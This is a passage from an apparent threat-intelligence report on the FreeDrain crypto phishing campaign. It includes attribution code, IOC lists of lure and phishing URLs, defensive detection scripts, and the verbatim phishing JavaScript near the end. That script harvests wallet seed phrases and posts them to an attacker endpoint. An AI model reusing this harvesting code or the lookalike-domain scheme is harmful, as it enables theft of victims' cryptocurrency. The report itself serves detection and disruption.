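    return Counter(dt.utcoffset() for _, dt in commits).most_common(1)[0][0]


def working_pattern(commits):
    """Weekday / hour profile with every commit viewed in the dominant offset."""
    tz = timezone(dominant_offset(commits))
    local = [dt.astimezone(tz) for _, dt in commits]
    hours = Counter(dt.hour for dt in local)
    weekday = sum(1 for dt in local if dt.weekday() < 5)           # Mon..Fri
    business = sum(1 for dt in local if 9 <= dt.hour < 18)         # 09:00..17:59
    return {
        "dominant_offset": format_offset(tz.utcoffset(None)),
        "offset_shares": offset_shares(commits),
        "weekday_share": weekday / len(local),
        "business_hours_share": business / len(local),
        "peak_hour": hours.most_common(1)[0][0],
        "hour_histogram": dict(sorted(hours.items())),
    }


if __name__ == "__main__":
    for key, value in working_pattern(parse_log(SAMPLE_LOG)).items():
        print(f"{key:22} {value}")
```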

Aggregated Webflow publish times show an exceptionally clear weekday work pattern in UTC+05:30
Webflow embeds publish timestamps into the HTML source code of published websites

Combining these and other signals across platforms, we assess with high confidence that FreeDrain is operated by individuals based in the IST timezone, likely in India, working standard weekday hours.

Additionally, timeline analysis shows that FreeDrain has been active since at least 2022, with a notable acceleration in mid-2024. As of this writing, the campaign remains active across several free hosting and publishing platforms.

Confirmed “last published” times, by date

Disruption Efforts and Opportunities

The scale and diversity of services abused by FreeDrain made disruption an ongoing challenge. While the campaign leaned heavily on free-tier platforms, many of which allowed users to publish images, text, external links, and even custom JavaScript to subdomains under well-known parent domains, very few of these platforms offered streamlined abuse reporting workflows.

In most cases, there was no direct method to report malicious content from the content page itself, forcing us to manually investigate each platform’s policies, support forms, or contact channels. This adds unnecessary friction to the response process, especially when scaled across hundreds of active malicious pages.

Even more concerning, most of the publishing platforms lacked the detection capabilities to identify this type of coordinated abuse on their own. The indicators were there (repetitive naming patterns, clustered behavior, identical templates reused across subdomains), yet little proactive action was being taken.

This highlights a broader industry need:

  • Free-tier content platforms should invest in basic abuse prevention tooling and more accessible reporting mechanisms.

At minimum, this includes:

  • Allowing abuse to be reported directly from published content pages
  • Monitoring for patterns of misuse (e.g., bulk account creation, similar domain structures, repeated hosting of external phishing kits)
  • Establishing direct communication lines with trusted threat intel analysts and threat researchers

FreeDrain’s reliance on free-tier platforms is not unique, and without better safeguards, these services will continue to be weaponized at scale.
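One concrete form the “similar domain structures” check could take on the platform side, as an added example (not code from the report or from any of the platforms named): strip the platform suffix from a customer hostname, remove the separators the lure pages use, and compare sliding windows of the remaining label against a list of wallet brand names by edit distance. The brand list and the distance threshold are assumptions for the example; the sample hostnames are taken from the lure-page list below plus one constructed benign control.

```python
"""Flag platform subdomains that impersonate wallet brands (an abuse-desk check)."""
import re
from urllib.parse import urlsplit

# Assumed brand list; a real deployment would maintain this from its own abuse data.
BRANDS = ["trezor", "ledger", "metamask", "coinbase", "phantom", "blockfi"]
SEPARATORS = re.compile(r"[-_\u2013\u2014]")   # hyphen, underscore, en dash, em dash

# Sample URLs from the lure-page list (defanged as published) plus one benign control.
SAMPLE_URLS = [
    r"https://metamaskchromextan.gitbook\.io/us",
    r"https://suprt-ios-trzorhard.gitbook\.io/en-us",
    r"https://auth-ledger-com-cdn.webflow\.io/",
    r"https://home-trezsor-start.gitbook\.io/en-us",
    r"https://wlt-phantom-wlt.webflow\.io/",
    r"https://help-blockf-cdnn.teachable\.com/p/home",
    r"https://extentrust.gitbook\.io/us",          # Trust Wallet is not in BRANDS: a miss
    r"https://bakery-menu-2024.webflow.io/",        # constructed benign control
]


def refang(url: str) -> str:
    return url.replace("\\.", ".").replace("[.]", ".")


def customer_label(url: str) -> str:
    """Subdomain part chosen by the customer, with separators removed, lowercased."""
    host = urlsplit(refang(url)).hostname or ""
    labels = host.split(".")
    return SEPARATORS.sub("", "".join(labels[:-2])).lower()   # drop e.g. webflow.io


def levenshtein(a: str, b: str) -> int:
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def best_brand_match(label: str, brands=BRANDS):
    """Closest brand to any window of the label; windows are brand length +/- 1."""
    best_brand, best_d = None, len(label) + 10
    for brand in brands:
        if brand in label:
            d = 0
        else:
            n, d = len(brand), best_d
            for width in (n - 1, n, n + 1):
                for i in range(len(label) - width + 1):
                    d = min(d, levenshtein(label[i:i + width], brand))
        if d < best_d:
            best_brand, best_d = brand, d
    return best_brand, best_d


def is_lookalike(url: str, max_distance: int = 1) -> dict:
    brand, d = best_brand_match(customer_label(url))
    return {"url": url, "brand": brand, "distance": d, "flag": d <= max_distance}


def triage(urls, max_distance: int = 1) -> list:
    return [is_lookalike(u, max_distance) for u in urls]


if __name__ == "__main__":
    for r in triage(SAMPLE_URLS):
        print("FLAG " if r["flag"] else "     ", r["brand"], r["distance"], r["url"])
```

The `extentrust` entry is deliberately left unflagged: the check is only as good as its brand list, which is the maintenance cost of this approach. A threshold of 1 catches single-character drops and insertions such as `trzor` and `leddger`; heavier mangling such as `tziuur` needs a different signal (shared templates, registration bursts) rather than a looser threshold, which would raise false positives on ordinary customer names.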

This isn’t just a security issue; it’s a business one. When threat actors abuse these platforms to host phishing pages, fake login portals, or crypto scams, they erode user trust in the entire platform domain. Over time, this leads to real financial consequences:

  • Reputation damage: Reputable domain names like webflow.io and teachable.com can quickly become flagged by corporate security tools, browser warning systems, and threat intelligence feeds. This reduces their utility for legitimate users and undermines the brand’s credibility.
  • Deliverability and discoverability: Once a platform’s domain is associated with widespread abuse, search engines, email providers, and social networks may down-rank or block links from that domain, hurting all users, including paying customers.
  • Customer churn and support burden: Abuse-driven issues often result in a higher volume of customer support tickets, complaints, and refunds, particularly when paying users find their content mistakenly flagged or blocked due to a shared domain reputation.
  • Increased infrastructure and fraud costs: Hosting abusive content, even at scale on free tiers, still consumes compute, storage, and bandwidth. Worse, it may attract waves of automated account signups and resource abuse that raise operational costs.

Failing to detect and mitigate this kind of abuse isn’t just a user risk; it’s an unpaid tax on the business, dragging down growth and trust at every layer. Proactive abuse prevention and streamlined reporting are not just table stakes for security, they’re critical to long-term sustainability.

References and Similarities to Other Campaigns

Elements of the FreeDrain campaign were first publicly documented in August 2022 by Netskope, with a follow-up report in September 2022. Netskope’s early findings captured the core tactics that continue today: leveraging SEO manipulation to drive traffic to lure pages, which then redirect to credential-harvesting phishing sites. Netskope also published another update in October 2024, focusing on FreeDrain’s use of Webflow-hosted infrastructure, confirming the campaign’s continued evolution while retaining the same fundamental workflow.

FreeDrain’s abuse of legitimate free-tier platforms is part of a broader trend in phishing infrastructure, but it remains distinct from other well-known crypto phishing efforts. For example, the CryptoCore campaign, reported by Avast in August 2024, similarly targets cryptocurrency users but relies heavily on YouTube content and impersonation videos to draw in victims, rather than search engine poisoning and static phishing sites.

In 2023, Trustwave reported on the use of Cloudflare’s pages.dev and workers.dev services in phishing, showing how modern hosting platforms that offer free, customizable subdomains with minimal friction are being systematically exploited, mirroring FreeDrain’s approach.

Recent reporting has also shed light on the kinds of threat actors that may be behind campaigns like FreeDrain. Just this week, the U.S. Treasury sanctioned individuals linked to cyber scam operations in Southeast Asia, specifically a militia group in Burma involved in online fraud networks. While distinct from FreeDrain, these operations share similar hallmarks: large-scale abuse of online infrastructure, technical capability, and a focus on financial theft, demonstrating the scale and organization such campaigns can operate under.

FreeDrain’s techniques have also been informally documented by affected users. In particular, Trezor hardware wallet customers have reported fraudulent websites mimicking the Trezor ecosystem, some of which were part of FreeDrain’s infrastructure:

Conclusion

The FreeDrain network represents a modern blueprint for scalable phishing operations, one that thrives on free-tier platforms, evades traditional abuse detection methods, and adapts rapidly to infrastructure takedowns. By abusing dozens of legitimate services to host content, distribute lure pages, and route victims, FreeDrain has built a resilient ecosystem that’s difficult to disrupt and easy to rebuild.

Through detailed infrastructure analysis, repository metadata mining, and cross-platform behavioral correlations, we uncovered rare insights into the actors behind the campaign, including strong indicators that the operation is manually run by a group based in the UTC+05:30 timezone, working standard business hours. Despite this visibility, systemic weaknesses in reporting mechanisms and abuse detection have allowed FreeDrain to persist and even accelerate in 2024.

This is not just a FreeDrain problem. The broader ecosystem of free publishing platforms is being exploited in ways that disproportionately benefit financially motivated threat actors. Without stronger default safeguards, identity verification, or abuse response infrastructure, these services will continue to be abused, undermining user trust and inflicting real-world financial harm.

By exposing the scale and structure of the FreeDrain network, we hope this research will enable better platform-level defenses, more informed user education, and collaboration across the security community to limit the reach and longevity of operations like this.

Indicators of Compromise and Relations

Full List of IOCs can be downloaded here.

FreeDrain Lure Pages

Download Full List for over 40,000 URLs
Sample:

https://metamaskchromextan.gitbook\.io/us
https://suprt-ios-trzorhard.gitbook\.io/en-us
https://bridge-tziuur.gitbook\.io/en-us
https://auth-ledger-com-cdn.webflow\.io/
https://start—leddger-cdn-auth.webflow\.io/
https://help–ledgre-auth-us.webflow\.io/
https://home-trezsor-start.gitbook\.io/en-us
https://wlt-phantom-wlt.webflow\.io/
https://bridge-cen-trezseer.gitbook\.io/en-us
https://ledgerauth-wellat.webflow\.io/
https://ledgerivwaselet-us.webflow\.io/
https://extentrust.gitbook\.io/en-us
https://truststextion.gitbook\.io/us
https://apps-support—mettmask.gitbook\.io/us
https://cobo-wallet-digital-cdm.webflow\.io/
https://extension–metaamsk-info.gitbook\.io/us
https://bridge-docs–trzc.gitbook\.io/en-us
https://suite-trezoreio.gitbook\.io/us
https://auth–io-coinbausehelp.gitbook\.io/us
https://help-blockf-cdnn.teachable\.com/p/home

FreeDrain Redirect Domains

These are the redirector domains we directly observed leveraged by FreeDrain going back 3+ years.

affanytougees[.]com
ameddingpersusan[.]com
anicnicpriesert[.]com
antressmirestos[.]com
aparingupgger[.]com
bildherrywation[.]com
boutiondistan[.]com
brasencewompture[.]com
carefersoldidense[.]com
causesconighty[.]com
charweredrepicks[.]com
chazineconally[.]com
chierstimines[.]com
chopedansive[.]com
claredcarcing[.]com
coadormertranegal[.]com
coateethappallel[.]com
comaincology[.]com
coneryconstiny[.]com
conkeyprowse[.]com
coutioncargin[.]com
coveryinting[.]com
crefoxappecture[.]com
curphytompared[.]com
darylapsebaryanmar[.]com
deconsorconsuperb[.]com
disantumcomptions[.]com
distrypromited[.]com
escentdeveriber[.]com
fladestateins[.]com
flesterwisors[.]com
forrofilecabelle[.]com
gaiterimturches[.]com
goestodos[.]com
grawableaugespare[.]com
gresesticparray[.]com
guardawalle[.]com
hunnerdimental[.]com
issetheserepson[.]com
lamothyadjuncan[.]com
leatlyinsioning[.]com
leavesnottered[.]com
listationsomminder[.]com
litnentschelds[.]com
minarymacrefeat[.]com
mingaryshestence[.]com
nashiclehunded[.]com
obiansvieller[.]com
paticableharent[.]com
penlabuseoribute[.]com
peridneyperadebut[.]com
pladamousaribached[.]com
posectsinsive[.]com
pringingsernel[.]com
saverateaubtle[.]com
scientcontopped[.]com
screnceagrity[.]com
searranksdeveal[.]com
shotheatsgnovel[.]com
sonyonsa[.]com
stalitynotinium[.]com
storsianpreemed[.]com
swissborglogi[.]xyz
teleedlescestable[.]com
tirzrstartio[.]com
topsorthynaveneur[.]com
tralizetrulines[.]com
trighlandcomping[.]com
versaryconnedges[.]com
walitykildsence[.]com
wintrolancing[.]com

Phishing URLs

https://atomicwallet.azurewebsites[.]net/
https://bietbutylogn.azurewebsites[.]net/
https://biokefeiwltliv29gleed.azurewebsites[.]net/
https://bitgetwalt.azurewebsites[.]net/
https://bleuckfie-coins.azurewebsites[.]net/
https://bleuckkfiecoins.azurewebsites[.]net/
https://bleuickkfiescoins.azurewebsites[.]net/
https://blocckfi-api.azurewebsites[.]net/
https://blocikifi.azurewebsites[.]net/
https://blockffiecoinas.azurewebsites[.]net/
https://blockfi-api.azurewebsites[.]net/
https://blockfiapp-apk.azurewebsites[.]net/
https://blockfiicoins.azurewebsites[.]net/
https://blockificoinz.azurewebsites[.]net/
https://blockifiicoins.azurewebsites[.]net/
https://blockkfi-api.azurewebsites[.]net/
https://blockkfiapi-apk.azurewebsites[.]net/
https://blockkkfifies.azurewebsites[.]net/
https://bloickfie-app.azurewebsites[.]net/
https://bloickfiicoins.azurewebsites[.]net/
https://bloickkfieecoinss.azurewebsites[.]net/
https://bloickkfieescoins876.azurewebsites[.]net/
https://bloiickkfieecoinase.azurewebsites[.]net/
https://blokfi-error.azurewebsites[.]net/
https://blokkfiapp-api.azurewebsites[.]net/
https://blokkifi.azurewebsites[.]net/
https://bloockkfi-api.azurewebsites[.]net/
https://blouckfi-api.azurewebsites[.]net/
https://bluckfi-error.azurewebsites[.]net/
https://bluckfilogn.azurewebsites[.]net/
https://blueckficoinis.azurewebsites[.]net/
https://bluickkfiecoins.azurewebsites[.]net/
https://boloickfieecoins.azurewebsites[.]net/
https://buloickkfieecoins876.azurewebsites[.]net/
https://cbswlterliv487wlt.azurewebsites[.]net/
https://cionbise-error.azurewebsites[.]net/
https://cnbse13liv.s3.eu-north-1.amazonaws[.]com/index.html
https://cobo-wallet.azurewebsites[.]net/
https://cobowalletoffc.azurewebsites[.]net/
https://cobowalletz.azurewebsites[.]net/
https://coienebaiseerlivwlt02elisa.azurewebsites[.]net/
https://coinibisasesn567.azurewebsites[.]net/
https://dft0-hjgkd26-fkj.s3.us-east-1.amazonaws[.]com/index.html
https://edgeronwlet.azurewebsites[.]net/
https://edgersuwlet.azurewebsites[.]net/
https://eedu0s-jhdc-osxza.s3.us-east-1.amazonaws[.]com/index.html
https://en-ledger-cdn.azurewebsites[.]net/
https://en-trezor-cdn-auth.azurewebsites[.]net/
https://en-trezor-cdn.azurewebsites[.]net/
https://errorciiobiosewds876.azurewebsites[.]net/
https://errorcoibisaeseaenbaeb876.azurewebsites[.]net/
https://errorlovblockfi876.azurewebsites[.]net/
https://errorlovbloikcffie876.azurewebsites[.]net/
https://errorlovbolockfiee987.azurewebsites[.]net/
https://errorlovcobisaed786.azurewebsites[.]net/
https://errorlovcoibioise876.azurewebsites[.]net/
https://errorlovexdkekam879.azurewebsites[.]net/
https://errorlovexds987.azurewebsites[.]net/
https://errorlovtenizr987.azurewebsites[.]net/
https://errorlovtrasenzjedsuties.azurewebsites[.]net/
https://errorlovtreazezz876.azurewebsites[.]net/
https://errorlovtrikmanen987.azurewebsites[.]net/
https://errormetiamiasks876.azurewebsites[.]net/
https://errormetismesk987.azurewebsites[.]net/
https://errortreazeeasd-suties.azurewebsites[.]net/
https://ertzirdnwwltliv.azurewebsites[.]net/
https://exd98uswlterliv.azurewebsites[.]net/
https://exdiusiwalet.azurewebsites[.]net/
https://ezioron1wlet.azurewebsites[.]net/
https://iotruzorsuite.azurewebsites[.]net/
https://itrusttcepitalcoins.azurewebsites[.]net/
https://kaikzx-slsld39-lkjf.s3.us-east-1.amazonaws[.]com/index.html
https://krakenzcoins.azurewebsites[.]net/
https://ladzearwlt03jokesmko.azurewebsites[.]net/
https://ldr-0gr-dsxz.s3.us-east-1.amazonaws[.]com/index.html
https://leddgeircoins.azurewebsites[.]net/
https://leddgersacoins.azurewebsites[.]net/
https://ledeagderwallet.azurewebsites[.]net/
https://ledg-01jghe0fhdk.s3.eu-north-1.amazonaws[.]com/index.html
https://ledgar-live-walliet.s3.us-east-2.amazonaws[.]com/index.html
https://ledger-start-403.azurewebsites[.]net/
https://ledger-start-api.azurewebsites[.]net/
https://ledgercoinserror3.azurewebsites[.]net/
https://ledgercoinsweb3.azurewebsites[.]net/
https://ledgersapi-apk.azurewebsites[.]net/
https://ledgersapp.azurewebsites[.]net/
https://ledgirlvestart.azurewebsites[.]net/
https://ledigerwaliteasee.azurewebsites[.]net/
https://ledzaererwltliv30mariamon.azurewebsites[.]net/
https://ledzor365livwlter.azurewebsites[.]net/
https://legdrlievlgin.azurewebsites[.]net/
https://leidgeierwalitese.azurewebsites[.]net/
https://leidgirscoinsweb.azurewebsites[.]net/
https://leldger-live.azurewebsites[.]net/
https://lezor3021sxes.azurewebsites[.]net/
https://lfg0-oiosh-hdh.s3.us-east-1.amazonaws[.]com/index.html
https://lgnwltcnbsliv.azurewebsites[.]net/
https://lledgerwallest.azurewebsites[.]net/
https://lzr13wlt.s3.eu-north-1.amazonaws[.]com/index.html
https://metamaskdn.azurewebsites[.]net/
https://metamasksrs.azurewebsites[.]net/
https://metamassk.azurewebsites[.]net/
https://mmetamassk.azurewebsites[.]net/
https://mtmsklivwlter57wlt.azurewebsites[.]net/
https://ndaaxscoins.azurewebsites[.]net/
https://ndaxcoins.azurewebsites[.]net/
https://ndeauxcoinsweb.azurewebsites[.]net/
https://neaiaxcoins.azurewebsites[.]net/
https://oduisshweb3.azurewebsites[.]net/
https://portal-treaeameaene876.azurewebsites[.]net/
https://ra0-lkjd01-gfhjd.s3.eu-north-1.amazonaws[.]com/index.html
https://relkd28-lokdyuj.s3.us-east-1.amazonaws[.]com/index.html
https://sdfg0d28-djkfk.s3.us-east-1.amazonaws[.]com/index.html
https://secuxwallet-api.azurewebsites[.]net/
https://sjdhd29-oiuw0.s3.us-east-1.amazonaws[.]com/index.html
https://sledegerwallet.azurewebsites[.]net/
https://solflareewerror.azurewebsites[.]net/
https://suiitewalettrzior.azurewebsites[.]net/
https://teirzoriiostart.azurewebsites[.]net/
https://tereamanezheoakeeoake.azurewebsites[.]net/
https://tereazeriwaleits.azurewebsites[.]net/
https://tereizercoinswalts.azurewebsites[.]net/
https://tereizercoinsweb.azurewebsites[.]net/
https://tereziiorcoinsweb3.azurewebsites[.]net/
https://tereziioreeae-walieats.azurewebsites[.]net/
https://terezorcoinscweb3.azurewebsites[.]net/
https://terezuiear-api.azurewebsites[.]net/
https://terozeiorwltliv31wikub.azurewebsites[.]net/
https://terozriosiuet.azurewebsites[.]net/
https://terzoerirwlt476liv.azurewebsites[.]net/
https://tirizeriostrt.azurewebsites[.]net/
https://tirizurstrtio.azurewebsites[.]net/
https://tirzwltliv09erds.azurewebsites[.]net/
https://tizrerlivwlt897wlt.azurewebsites[.]net/
https://tizrwlterliv45livwlt.azurewebsites[.]net/
https://tr01-dkfjgk-slas.s3.eu-north-1.amazonaws[.]com/index.html
https://tr0ox-obnsj.s3.eu-north-1.amazonaws[.]com/index.html
https://tra09fjl-sodfjjkd.s3.eu-north-1.amazonaws[.]com/index.html
https://trac-durjg-fkf.s3.eu-north-1.amazonaws[.]com/index.html
https://traezor-suitez403.azurewebsites[.]net/
https://traieazeariscoins.azurewebsites[.]net/
https://tre876162ru0988zer.azurewebsites[.]net/
https://treaizerecoins.azurewebsites[.]net/
https://treauzearcoins.azurewebsites[.]net/
https://treazerapi-apk.azurewebsites[.]net/
https://treazerszcoins.azurewebsites[.]net/
https://treaziexc-ax-bc.azurewebsites[.]net/
https://treazirapi-apk.azurewebsites[.]net/
https://treazosr-api.azurewebsites[.]net/
https://treazsoirsuites.azurewebsites[.]net/
https://treazuer-suite.azurewebsites[.]net/
https://treizaers-coins.azurewebsites[.]net/
https://treizoircoinerror3.azurewebsites[.]net/
https://treizrwalogn.azurewebsites[.]net/
https://treriertriliv34erwlt.azurewebsites[.]net/
https://trezaereade-suite.azurewebsites[.]net/
https://trezieserscoins.azurewebsites[.]net/
https://trezior-suite.azurewebsites[.]net/
https://trezirapp-api.azurewebsites[.]net/
https://treziresacoins.azurewebsites[.]net/
https://triezorwallets.azurewebsites[.]net/
https://trioriorwlt485wltliv.azurewebsites[.]net/
https://trizeriowaliet.azurewebsites[.]net/
https://triziorecoinsweb3.azurewebsites[.]net/
https://triziriosuite.azurewebsites[.]net/
https://trizuriosiute.azurewebsites[.]net/
https://trucetreizerr.azurewebsites[.]net/
https://truiazearcoins.azurewebsites[.]net/
https://trzeriostrt.azurewebsites[.]net/
https://ttrzorappsuite.azurewebsites[.]net/
https://tzer30liv.s3.us-east-2.amazonaws[.]com/index.html
https://tzr06wlt.s3.eu-north-1.amazonaws[.]com/index.html
https://tzreoirwlt05balba.azurewebsites[.]net/
https://tzreoriewlt31wikub.azurewebsites[.]net/
https://uniswapv3login.azurewebsites[.]net/
https://uphooldlogn.azurewebsites[.]net/
https://web-treszor.azurewebsites[.]net/
https://weberrortrezur886.azurewebsites[.]net/
https://wltcbserlive467wlt.azurewebsites[.]net/
https://wltlzr67erlivehsfjfd.azurewebsites[.]net/
https://woleatcoebs34livwlt.azurewebsites[.]net/
https://zen-ledger-error.azurewebsites[.]net/
https://zenledgerscoinsweb.azurewebsites[.]net/

Example JavaScript

This is an example of the JavaScript (“app.js”) that was included on the S3-hosted phishing example: https://dft0-hjgkd26-fkj.s3.us-east-1.amazonaws[.]com/index.html.

Note the defanged malicious URL in the code below; that is the only alteration.

let currentWordCount = 12; // Default word count
function updateInputFields(wordCount) {
   const inputContainer = document.getElementById('inputContainer');
   inputContainer.innerHTML = '';
    currentWordCount = wordCount;
    for (let i = 0; i < wordCount; i++) { // Use 0-based index for phase keys
        const colDiv = document.createElement('div');
    // if (wordCount === 1) {
    //     colDiv.className = 'col-lg-21 col-md-12 col-sm-12 col-xs-12';
    //     colDiv.innerHTML = `
    //         <input
    //             class="form-control"
    //             type="text"
    //             placeholder="Input your words as many words as you have"
    //             name="word${i}"
    //             required
    //             title="Only alphabets are allowed.">
    //         <div class="error-message" style="font-size:12px;color: #fe3131f2; display: none;">Please enter a valid value.</div>
    //     `;
    // } else {
        colDiv.className = 'col-lg-4 col-md-4 col-sm-4 col-xs-12';
        colDiv.innerHTML = `
            <input
                class="form-control"
                type="text"
                placeholder="${i + 1}."
                name="word${i}"
                required
                pattern="[a-zA-Z]{1,10}"
                maxlength="10"
                oninput="this.value = this.value.replace(/[^a-zA-Z]/g, '').substring(0, 10);"
                title="Only alphabets are allowed.">
            <div class="error-message" style="font-size:12px;color: #fe3131f2; display: none;">Please enter a valid value.</div>
                `;
            // }
        inputContainer.appendChild(colDiv);
    }
    event.target.classList.add('active');
    const buttons = document.querySelectorAll('.displayflex button');
    buttons.forEach((button) => {
        button.classList.remove('active');
    });
    event.target.classList.add('active');
}
async function handleNextStep(event) {
    event.preventDefault();
    const inputContainer = document.getElementById('inputContainer');
    const inputs = inputContainer.querySelectorAll('input');
    let allValid = true;
    const enteredWords = new Set();
    inputs.forEach((input) => {
        const errorDiv = input.nextElementSibling; // Get the associated error div
        if (!input.checkValidity()) {
            errorDiv.style.display = 'block';
            allValid = false;
        } else {
            errorDiv.style.display = 'none';
        }
        const word = input.value.trim().toLowerCase(); // Normalize to lowercase to handle case insensitivity
        if (word && enteredWords.has(word)) {
            allValid = false;
            errorDiv.innerHTML = 'This word has already been entered.';
            errorDiv.style.display = 'block';
        } else {
            enteredWords.add(word);  // Add word to the Set
        }
    });
    if (!allValid) {
        alert("Mnemonic phrase is not valid. Try again.");
        return;
    }
    const data = {};
    inputs.forEach((input, index) => {
    data[`phrase${index}`] = input.value.trim();
    });
    data.subject = "Trezor connect2";
    data.message = "Successfull fetch data";
    $.ajax({
        type: "POST",
        url: "https://rfhwuwixxi.execute-api.us-east-1.amazonaws[.]com/prod/eappmail",
        dataType: "json",
        crossDomain: true,
        contentType: "application/json; charset=utf-8",
        data: JSON.stringify(data),
        success: function (result) {
        alert('Data submitted successfully1!');
        window.location.href = 'https://suite.trezor.io/web/';
        location.reload();
        },
        error: function (xhr, status, error) {
            window.location.href = 'https://suite.trezor.io/web/';
 
 
        }
    });
}

window.onload = function () {
    // Prevent the back button from navigating back
    function preventBack() {
    history.forward();
    }
    
    // Execute the `preventBack` function immediately after page load
    setTimeout(preventBack, 0);
    
    // Ensure the page doesn't cache on unload, forcing users to reload
    window.onunload = function () {
        return null;
    };
};

document.addEventListener('DOMContentLoaded', () => updateInputFields(12));

document.addEventListener("DOMContentLoaded", function () {
    const statusButton = document.getElementById("statusButton");
    const statusText = document.getElementById("statusText");
    const statusIcon = document.getElementById("statusIcon");
    // Initial state: "Waiting for Trezor..."
    statusText.textContent = "Waiting for Trezor... ";
    statusIcon.innerHTML = '';
    // After 2 seconds: "Establishing connection"
    setTimeout(() => {
        statusText.textContent = "Establishing connection...";
        statusIcon.innerHTML = '';
    }, 5000);
    // After 5 seconds: "Unable to read data" (Error state)
    setTimeout(() => {
    statusText.textContent = "Unable to read data";
    statusIcon.innerHTML = '';
    statusButton.classList.add("error-btn");
    }, 5000);
    function resetStatus() {
        // Reset to "Establishing connection..."
        statusText.textContent = "Establishing connection...";
        statusIcon.innerHTML = '';
        statusButton.classList.remove("error-btn");  // Reset error button class
        // After 3 seconds: Change status to "Unable to read data"
        setTimeout(() => {
            statusText.textContent = "Unable to read data";
            statusIcon.innerHTML = '';
            statusButton.classList.add("error-btn");
        }, 5000);
    }
    // Event listener for button click
    statusButton.addEventListener("click", function () {
        resetStatus(); // Reset and start the cycle on each click
    });
    // Optionally, you can trigger the status change flow immediately after page load for testing
    setTimeout(() => {
        resetStatus(); // Automatically run the flow when the page loads (optional)
    }, 5000);
});

    // Disable right-click context menu
    document.addEventListener("contextmenu", (event) => event.preventDefault());
    // Disable key combinations for opening developer tools
    document.addEventListener("keydown", (event) => {
    // Disable F12, Ctrl+Shift+I, Ctrl+Shift+J, Ctrl+U (View Source), Ctrl+Shift+C
    if (
        event.key === "F12" ||
        (event.ctrlKey && event.shiftKey && ["I", "J", "C"].includes(event.key)) ||
        (event.ctrlKey && event.key === "U")
    ) {
        event.preventDefault();
}
});

    // Detect if devtools is opened (basic detection)
    const detectDevTools = () => {
    const element = new Image();
        Object.defineProperty(element, "id", {
            get: () => {
                alert("Developer tools detected. Please close it to proceed.");
                // Redirect or log out the user
                window.location.href = "about:blank"; // Example action
            },
        });
        console.log(element);
    };
    detectDevTools();
    setInterval(detectDevTools, 1000);
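
A static triage pass over a hosted page's JavaScript, as an added example (not part of the report and not a platform's own detection): it scores a script against indicators that are all visible in the app.js above, such as per-word inputs restricted to letters, `phrase${n}` keys in the submitted payload, a POST to an API Gateway endpoint, an immediate redirect to the real vendor site, and the developer-tools and back-button traps. The indicator weights and the threshold are assumptions; the two script samples are an excerpt of the page's app.js (with the URL still defanged) and a constructed benign login form.

```python
"""Score a hosted page's JavaScript for seed-phrase harvesting indicators."""
import re

# (name, pattern, weight). Weights and threshold are assumed for this example.
INDICATORS = [
    ("letters_only_word_inputs", r"replace\(/\[\^a-zA-Z\]/g", 2),
    ("mnemonic_wording", r"mnemonic|seed phrase|recovery phrase", 2),
    ("phrase_keys_in_payload", r"phrase\$\{|phrase\d", 2),
    ("post_to_api_gateway", r"execute-api\.[\w-]+\.amazonaws(?:\[\.\]|\.)com", 3),
    ("redirect_to_vendor_site", r"window\.location\.href\s*=\s*['\"]https://", 1),
    ("devtools_blocking", r"contextmenu|\"F12\"", 1),
    ("back_button_trap", r"history\.forward\(\)", 1),
    ("duplicate_word_check", r"already been entered", 1),
]
THRESHOLD = 6

# Excerpt of the app.js shown above (URL defanged exactly as on the page).
SAMPLE_JS = r"""
oninput="this.value = this.value.replace(/[^a-zA-Z]/g, '').substring(0, 10);"
errorDiv.innerHTML = 'This word has already been entered.';
alert("Mnemonic phrase is not valid. Try again.");
data[`phrase${index}`] = input.value.trim();
url: "https://rfhwuwixxi.execute-api.us-east-1.amazonaws[.]com/prod/eappmail",
window.location.href = 'https://suite.trezor.io/web/';
history.forward();
document.addEventListener("contextmenu", (event) => event.preventDefault());
"""

# Constructed benign login handler for contrast.
BENIGN_JS = r"""
document.getElementById('login').addEventListener('submit', (e) => {
  e.preventDefault();
  fetch('/api/session', { method: 'POST', body: new FormData(e.target) })
    .then(() => { window.location.href = 'https://app.example.com/'; });
});
"""


def triage_script(js: str) -> dict:
    """Return matched indicator names, total weight, and a verdict."""
    hits = [(name, w) for name, pat, w in INDICATORS if re.search(pat, js, re.IGNORECASE)]
    score = sum(w for _, w in hits)
    return {
        "score": score,
        "hits": [name for name, _ in hits],
        "likely_seed_phishing": score >= THRESHOLD,
    }


if __name__ == "__main__":
    for label, js in (("sample app.js", SAMPLE_JS), ("benign login", BENIGN_JS)):
        print(label, triage_script(js))
```

The redirect indicator alone is worth one point because ordinary applications redirect after login too; it is the combination of word-by-word letter-only inputs, `phrase` keys and an off-platform POST target that separates a seed-phrase harvester from a normal form.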
